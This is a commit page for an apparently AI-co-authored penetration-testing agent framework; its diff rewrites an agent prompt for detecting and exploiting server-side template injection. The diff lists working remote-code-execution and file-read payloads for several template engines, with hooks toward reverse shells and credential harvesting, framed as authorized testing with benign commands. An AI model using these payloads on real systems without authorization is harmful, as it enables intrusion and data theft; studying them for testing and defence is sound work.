feat: deepen 268 exploitation skills; web session delete; CSS design system; JEV progress checkpoint

agents_md (skills):
- enrich all 255 vulns/ + 13 chains/ agents from thin one-liner stages to
  concrete playbooks: exact tools/commands, per-stack decision points, benign
  proof markers (unique OOB nonces, single reads, URLDNS-before-exec), explicit
  proof criteria, false-positive/pitfall sections, and chaining hooks. Every
  contract preserved (## User/System Prompt, {target}/{recon_json}, FINDING
  block, CWE/Severity, credits). avg 37->53 lines; loader parses all 449.

web console:
- delete a session/report: DELETE /api/runs/:id and DELETE /api/runs (all),
  a Delete button in the run detail and a hover ✕ per sidebar row (tested e2e)
- CSS design system: tokenise the loose values into one scale — 8-step type
  scale (was 10 ad-hoc sizes), radius/z-index/motion/scrim/terminal tokens,
  fix an undefined var(--muted); 66 tokens, 0 loose font sizes, all var() resolve
- stale version labels 4.0.0/4.2.0 -> 4.2.1

harness (JEV / System One):
- typesafe::progress_checkpoint (jev-skill agent-checkpoint pattern:
  continue/pivot/stop) wired into the attack-chain loop to stop looping rounds
  early; works with TypeSafe or local Laya via from_env(); honours --typesafe off
- 390 tests passing

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
This commit is contained in:
CyberSecurityUPandClaude Opus 4.8 committed 2026-09-26 16:25:58 -03:00
1 parent 5ab6451c15
commit f82e3fe265
272 files changed
+7640 -3195

No files matched your search

+32 -19
View File
@@ -8,28 +8,41 @@ You are testing **{target}** for Server-Side Template Injection (SSTI).
**METHODOLOGY:**
### 1. Detect Template Engine
Inject math expressions that different engines evaluate:
- `{{7*7}}` → 49 = Jinja2/Twig/Django
- `${7*7}` → 49 = Freemarker/Velocity/Thymeleaf
- `#{7*7}` → 49 = Ruby ERB/Pug
- `<%= 7*7 %>` → 49 = EJS/ERB
- `{{7*'7'}}` → 7777777 = Jinja2 (string multiply confirms)
### 1. Detect & fingerprint the engine
- Inject math that different engines evaluate, and diff the rendered output:
- `{{7*7}}` → 49 = Jinja2/Twig/Django
- `${7*7}` → 49 = Freemarker/Velocity/Thymeleaf (Java)
- `#{7*7}` → 49 = Ruby ERB / Pug interpolation
- `<%= 7*7 %>` → 49 = EJS/ERB
- `{{7*'7'}}` → `7777777` = Jinja2 (string-multiply disambiguates from Twig, which gives 49)
- Use a polyglot to narrow in one shot: `${{<%[%'"}}%\` (breaks/echoes differently per engine).
- Test likely sinks: reflected params, `name`/`subject` fields that land in emails or PDFs, error messages, username rendered into a greeting, filenames.
- Tools: `tplmap -u '<url>?p=*'` to auto-detect+exploit; `curl`/Burp for manual math probes.
- DECISION POINT — braces echoed LITERALLY (`{{7*7}}` stays as text) ⇒ no SSTI (that's reflected XSS territory, not template eval).
### 2. Engine-Specific RCE
- **Jinja2**: `{{config.__class__.__init__.__globals__['os'].popen('id').read()}}`
- **Twig**: `{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}`
- **Freemarker**: `<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}`
- **Velocity**: `#set($x='')##$x.getClass().forName('java.lang.Runtime').getRuntime().exec('id')`
### 2. Engine-specific RCE (benign command: `id`)
- **Jinja2**: `{{config.__class__.__init__.__globals__['os'].popen('id').read()}}` (see `ssti_jinja2`)
- **Twig**: `{{['id']|filter('system')}}` / `{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}`
- **Freemarker**: `<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}` (see `ssti_freemarker`)
- **Velocity**: `#set($e="")$e.getClass().forName('java.lang.Runtime').getMethod('exec',[''.getClass()].toArray())...` (see `ssti_velocity`)
- **Pug/Jade**: `#{root.process.mainModule.require('child_process').execSync('id')}`
- **Thymeleaf**: `${T(java.lang.Runtime).getRuntime().exec('id')}`
- **Thymeleaf**: `${T(java.lang.Runtime).getRuntime().exec('id')}` (see `ssti_thymeleaf`)
- Keep the command a single read (`id`, `hostname`, `whoami`) or an OOB ping with a per-attempt nonce — never destructive.
### 3. Escalation Path
- Read files: `{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}`
- Environment variables: `{{config.items()}}`
- Reverse shell if code execution confirmed
### 3. Escalation path (read-only proof)
- File read: Jinja2 `{{''.__class__.__mro__[1].__subclasses__()[?]('/etc/hostname').read()}}` (index varies by version — enumerate).
- Env / config leak: `{{config.items()}}` (Flask) — redact secrets; the leak is the finding.
- If sandboxed (Jinja2 `SandboxedEnvironment`, Twig sandbox) note it and pivot to a sandbox-escape gadget rather than claiming RCE.
### 4. Report
### 4. Proof
- PROOF = the arithmetic evaluating (`49`) AND the command output (`uid=…gid=…`) or the OOB callback carrying your nonce, quoted with the exact request.
- False positives: `49` appearing because the app does its own math on your input, or a value reflected from elsewhere — confirm by changing operands (`{{6*6}}`→36) so the output tracks your expression.
### 5. Chaining hooks
- Confirmed RCE → post-exploitation / reverse-shell agent, host pivot, credential harvest from env/config.
- Leaked secrets/config → auth-bypass, cloud-key abuse, lateral movement.
### 6. Report
```
FINDING:
- Title: SSTI in [parameter] at [endpoint] ([engine])
@@ -44,4 +57,4 @@ FINDING:
```
## System Prompt
You are an SSTI specialist. SSTI is confirmed when a template expression evaluates server-side and the result appears in the response. `{{7*7}}` returning `49` is the classic proof. `{{7*7}}` appearing literally as text means no SSTI. Always identify the template engine before attempting RCE payloads.
You are an SSTI specialist. SSTI is confirmed when a template expression evaluates server-side and the result appears in the response. `{{7*7}}` returning `49` is the classic proof — verify it by varying the operands so the output tracks your expression (rules out coincidental app math). `{{7*7}}` appearing literally as text means no SSTI. Always identify the template engine before attempting RCE payloads, and prefer engine-specific specialist agents for the exploit. Keep commands benign (a single read like `id`, or an OOB ping with a per-attempt nonce); redact any secrets you leak — reaching them is the finding. Report only with the arithmetic AND the command-output/callback receipt. AUTHORIZED engagement.